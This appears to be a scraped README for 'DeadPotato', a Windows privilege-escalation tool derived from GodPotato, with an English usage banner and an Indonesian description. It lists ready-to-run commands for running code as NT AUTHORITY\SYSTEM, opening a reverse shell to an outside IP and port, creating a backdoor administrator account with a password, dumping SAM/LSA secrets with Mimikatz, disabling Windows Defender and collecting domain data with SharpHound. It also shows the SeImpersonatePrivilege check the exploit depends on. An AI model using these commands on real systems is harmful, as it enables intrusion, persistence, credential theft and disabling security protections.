C:Userslypd0> GodPotato.exe
⠀⢀⣠⣤⣤⣄⡀⠀ _ _
⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _
⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_)
⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =-
⠈⠁⠀⠀⠀
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
(*) Example Usage(s):
-={ deadpotato.exe -MODULE [ARGUMENTS] }=-
-> deadpotato.exe -cmd "whoami"
-> deadpotato.exe -rev 192.168.10.30:9001
-> deadpotato.exe -exe paylod.exe
-> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
-> deadpotato.exe -shell
-> deadpotato.exe -mimi sam
-> deadpotato.exe -defender off
-> deadpotato.exe -sharphound
(*) Available Modules:
- cmd: Execute a command as NT AUTHORITYSYSTEM.
- rev: Attempts to establish a reverse shell connection to the provided host
- exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity).
- newadmin: Create a new administrator user on the local system.
- shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
- mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
- defender: Either enables or disables Windows Defender's real-time protection.
- sharphound: Attempts to collect domain data for BloodHound. Hak SeImpersonatePrivilege diaktifkan dalam konteks Anda? Dengan DeadPotato , dimungkinkan untuk mencapai hak istimewa maksimal pada sistem lokal.
Alat ini akan mencoba untuk memulai proses tinggi yang berjalan dalam konteks pengguna NT AUTHORITYSYSTEM dengan menyalahgunakan kelemahan RPCSS DCOM dalam menangani OXID, memungkinkan akses tidak terbatas pada mesin agar operasi penting dapat dilakukan secara bebas.-cmd digunakan. Banyak modul tersedia untuk digunakan, seperti -rev IP:PORT untuk memunculkan shell terbalik yang ditinggikan, -newadmin usr:pass untuk membuat pengguna Administrator lokal baru untuk persistensi, atau -mimi sam untuk membuang hash SAM.
Untuk menggunakan DeadPotato, hak SeImpersonatePrivilege harus diaktifkan dalam konteks saat ini. Untuk memverifikasi ini, perintah whoami /priv dapat dijalankan. Jika hak istimewa dinonaktifkan, eksploitasi tidak mungkin dilakukan dalam konteks saat ini.
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
Proyek "DeadPotato" ini adalah alat yang dibangun berdasarkan kode sumber mahakarya "GodPotato" oleh BeichenDream. Jika Anda menyukai proyek ini, pastikan juga untuk menunjukkan dukungan terhadap proyek aslinya
BeichenDream, Benjamin DELPY gentilkiwi , Pengembang BloodHound.
Proyek ini dilisensikan di bawah Lisensi Apache 2.0. Harap tinjau file LISENSI untuk lebih jelasnya.
